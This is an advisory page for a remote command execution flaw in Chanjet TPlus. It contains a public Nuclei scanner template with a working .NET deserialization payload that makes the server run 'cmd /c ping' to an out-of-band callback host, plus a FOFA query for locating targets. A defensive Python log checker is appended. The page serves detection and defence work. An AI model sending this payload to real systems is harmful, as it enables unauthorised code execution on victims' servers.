CNVD-2023-48562: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution

Date: 2025-08-01 | Affected software: Chanjet TPlus | PoC: public

Vulnerability description

Chanjet TPlus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.

PoC code [public]

id: CNVD-2023-48562

info:
  name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  classification:
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: cnvd,cnvd2023,chanjettplus,rce,oast,vuln

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
        Host: {{Hostname}}
        X-Ajaxpro-Method: GetStoreWarehouseByStore

        {
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
              "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c ping {{interactsh-url}}"
              }
            }
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "actorId或archivesId不能为空"
          - "\"Type\":\"System.ArgumentException\""
          - "Object reference not set to an instance of an object"
          - "System.NullReferenceException"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a004630440220772d1d2d6cb329d5d59e3963a7061111663d96b3f997c677723414e1df461ad6022011fd359134e0b30d65982f710f1f0471e266b0c64ef1f8ed424bad42c50f2d05:922c64590222798bb761d5b6d8e72950
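
A defender-side check for the request shape in the template above, as an added example that is not part of the original template or of any vendor code: it walks a logged AjaxPro JSON body and reports every object carrying a `__type` hint, marking the .NET types the request relies on. The function names, the type list, and the sample bodies are assumptions constructed for illustration.

```python
import json

# Assumption: type-name prefixes to flag. Both come from the request on this page;
# the second also matches System.Diagnostics.ProcessStartInfo. Extend as needed.
SUSPICIOUS_TYPES = ("System.Windows.Data.ObjectDataProvider", "System.Diagnostics.Process")
AJAXPRO_PREFIX = "/tplus/ajaxpro/"


def typed_objects(node, path="$"):
    """Yield (json_path, type_name) for every object carrying a "__type" hint."""
    if isinstance(node, dict):
        hint = node.get("__type")
        if isinstance(hint, str):
            # Drop the assembly qualifier: "Ns.Type, Assembly, Version=..." -> "Ns.Type"
            yield path, hint.split(",", 1)[0].strip()
        for key, value in node.items():
            yield from typed_objects(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from typed_objects(value, f"{path}[{i}]")


def inspect_request(uri, body):
    """Return findings for one logged request; an empty list means nothing flagged."""
    if not uri.lower().startswith(AJAXPRO_PREFIX):
        return []
    try:
        doc = json.loads(body)
    except ValueError:
        return [("$", "unparseable-body")]
    findings = []
    for path, name in typed_objects(doc):
        verdict = "known-gadget-type" if name.startswith(SUSPICIOUS_TYPES) else "type-hint"
        findings.append((path, f"{verdict}:{name}"))
    return findings


# Constructed samples: a routine call and a body shaped like the template's request.
URI = "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore"
BENIGN = '{"storeID": "1001"}'
SHAPED = json.dumps({"storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "ObjectInstance": {"__type": "System.Diagnostics.Process, System",
                       "StartInfo": {"__type": "System.Diagnostics.ProcessStartInfo, System",
                                     "FileName": "placeholder"}}}})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("shaped", SHAPED)):
        print(label, inspect_request(URI, body))
```

Any `type-hint` finding on a parameter that normally holds a scalar, such as `storeID`, is worth reviewing even when the type is not on the list.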
